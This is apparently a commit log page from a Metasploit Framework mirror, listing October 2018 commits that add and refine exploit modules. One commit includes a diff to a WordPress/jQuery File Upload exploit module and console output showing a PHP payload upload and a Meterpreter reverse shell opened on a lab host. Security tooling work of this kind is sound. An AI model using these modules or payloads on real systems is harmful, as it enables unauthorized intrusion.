adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
55,054 Commits 27 Branches 1,043 Tags
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
Commit Graph

13654 Commits

Author SHA1 Message Date
Ivan Racic ee3c663baf Upgraded exploit to work on any Windows target 
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.
 2018-10-23 12:11:56 +02:00
William Vu 3d06c10ad0 Link to Apache AllowOverride directive and change 2018-10-23 03:51:16 -05:00
William Vu c9673df3b8 Add WordPress Work The Flow File Upload links 
As noted by @bcoles, we have a module exploiting this vuln in #5130,
though it was described as the WordPress plugin and not the asset it had
included. The vuln was "patched" in the plugin by deleting the code.
Somehow this flew under everyone's noses.

msf5 exploit(unix/webapp/wp_worktheflow_upload) > edit
msf5 exploit(unix/webapp/wp_worktheflow_upload) > git diff
[*] exec: git diff

diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
index 727c1936f5..2146be49ec 100644
--- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
+++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb
@@ -50,8 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
     post_data = data.to_s

     res = send_request_cgi({
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'),
+      'uri'       => '/jQuery-File-Upload/server/php/index.php',
       'method'    => 'POST',
       'ctype'     => "multipart/form-data; boundary=#{data.bound}",
       'data'      => post_data
@@ -70,8 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote

     print_status("Calling payload...")
     send_request_cgi(
-      'uri'       => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets',
-                                   'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename)
+      'uri'       => "/jQuery-File-Upload/server/php/files/#{php_pagename}"
     )
   end
 end
msf5 exploit(unix/webapp/wp_worktheflow_upload) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 172.28.128.1:4444
[+] Our payload is at: rLRFvlAiE.php. Calling payload...
[*] Calling payload...
[*] Sending stage (37775 bytes) to 172.28.128.3
[*] Meterpreter session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54386) at 2018-10-23 03:17:59 -0500
[+] Deleted rLRFvlAiE.php

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu-xenial
OS          : Linux ubuntu-xenial 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >

Welp.
 2018-10-23 03:51:11 -05:00
William Vu a55f7ff30a Clarify vuln (re)discovery vs. disclosure 
https://www.bleepingcomputer.com/news/security/jquery-file-upload-plugin-vulnerable-for-8-years-and-only-hackers-knew/
 2018-10-23 03:22:45 -05:00
William Vu b4bdc52597 Sort path list by frequency 2018-10-22 23:35:42 -05:00
William Vu dbc0c802d5 Add detection of additional paths 2018-10-22 23:35:42 -05:00
William Vu c4f8b6c937 Add rudimentary check method 2018-10-22 23:35:42 -05:00
William Vu dba7e35819 Refactor slightly with methods 
And also check upload response.
 2018-10-22 23:35:42 -05:00
William Vu e7ada1a40c Add timeout on payload request 
This ensures we don't block on execution.
 2018-10-22 23:35:42 -05:00
William Vu 15f14bb295 Add note about Apache .htaccess 2018-10-22 23:35:42 -05:00
William Vu a986a17bb0 Link to @lcashdol's PoC 2018-10-22 23:35:42 -05:00
William Vu 37dbdbf58f Update project URL to PR 2018-10-22 23:35:42 -05:00
William Vu 41721c31fb Add blueimp's jQuery (Arbitrary) File Upload 2018-10-22 23:35:42 -05:00
Green-m c0e8d09802 Add disclosure date. 2018-10-23 09:44:36 +08:00
William Vu 3ca309423a Add check method to detect 4.3BSD fingerd 2018-10-22 18:32:37 -05:00
William Vu 01d11e71db Add Space, BadChars, Encoder, and DisableNops 2018-10-22 18:32:37 -05:00
William Vu fa892d8eba Add Morris worm fingerd stack buffer overflow 2018-10-22 18:32:37 -05:00
Green-m 4711d6ba08 Move post module persistenct service to exploit. 2018-10-22 18:07:40 +08:00
William Vu 58a6c4137d Add a better timeout than expect can provide 2018-10-20 13:56:37 -05:00
William Vu a965abaf36 Add full payload support by setting $PATH 2018-10-20 13:56:33 -05:00
William Vu 60c4b87ad1 Prefer expect over sleeping between writes 2018-10-20 13:15:15 -05:00
William Vu ad6f15c8ca Add Morris worm sendmail debug mode exploit 2018-10-20 13:15:01 -05:00
Brendan Coles 7a36056713 Move exploit/qnx/qconn_exec to exploit/qnx/qconn/qconn_exec 2018-10-20 18:16:59 +00:00
William Vu aae74472d2 Land #10817, QNX qconn module rename 2018-10-20 03:10:22 -05:00
Wei Chen 3cee96d8ed Land #10664, add Windows SetImeInfoEx Win32k NULL Pointer Dereference 2018-10-18 14:42:14 -05:00
Wei Chen fac05db154 Update rescue statement 2018-10-18 14:30:20 -05:00
Tim W b3d45586db feedback from code review 2018-10-18 12:30:46 +08:00
Tim W 64e257649f cleanup module 2018-10-18 11:45:59 +08:00
Tim W 290d4428c1 create git mixin 2018-10-18 11:31:31 +08:00
Tim W 063e477ff2 git submodule url exec (CVE-2018-17456) 2018-10-18 11:02:28 +08:00
Brendan Coles a14df8d86e Move exploit/unix/misc/qnx_qconn_exec to exploit/qnx/qconn_exec 2018-10-16 16:21:28 +00:00
Tim W 2e91ec1495 semicolons :) 2018-10-16 14:59:27 +08:00
Tim W 96ba3c636b fix indentation and add author 2018-10-16 14:56:25 +08:00
Tim W 57e2dd2192 send payload url to loader 2018-10-16 14:41:34 +08:00
Shelby Pace 9e069c95f5 add auto targeting 2018-10-15 23:26:08 -07:00
Shelby Pace 6cdfe604d4 removed exception handling for reg_file_for_handle 2018-10-15 18:29:15 -07:00
Wei Chen 8e442cc980 Update documenation 2018-10-15 15:45:39 -05:00
Wei Chen b0313dd25c Update getgodm_http_response_bof for proper auto targets 2018-10-15 15:25:55 -05:00
Wei Chen ff9f3ed9ff Add support for v5 2018-10-15 15:14:12 -05:00
Wei Chen 5433d2cca9 Sync up upstream master 2018-10-15 14:19:07 -05:00
Dhiraj Mishra f78ccbf995 Indentation 2018-10-15 08:32:58 +05:30
h00die 8877582086 Land #10668 rsh stack clash solaris priv esc 2018-10-14 10:34:48 -04:00
Shelby Pace a942654515 rescue-from-method addressed 2018-10-12 14:47:05 -05:00
Shelby Pace 26631bcfbd addressed suggestions 2018-10-12 14:35:42 -05:00
William Vu 5b14d94957 Land #10671, struts2_namespace_ognl updates 
There are still some outstanding concerns, but I want to unblock this.
 2018-10-12 11:08:33 -05:00
William Vu 2989507b85 Copy check for data_header to avoid crash 
Variable was used but out of scope.
 2018-10-12 11:06:26 -05:00
Dhiraj Mishra 96eeaf7da3 Made few changes 
Thank you bcoles
 2018-10-12 11:47:53 +05:30
Shelby Pace a67122aaf7 updated doc, added x86_64 binary 2018-10-11 12:37:51 -05:00
Shelby Pace 521b50af55 added separate binaries, extended for x86 2018-10-11 10:43:35 -05:00
Alex Gonzalez 1da99c8bd1 Fixed syntax errors 
Corrected redundant returns and indentation errors
 2018-10-11 10:01:47 -04:00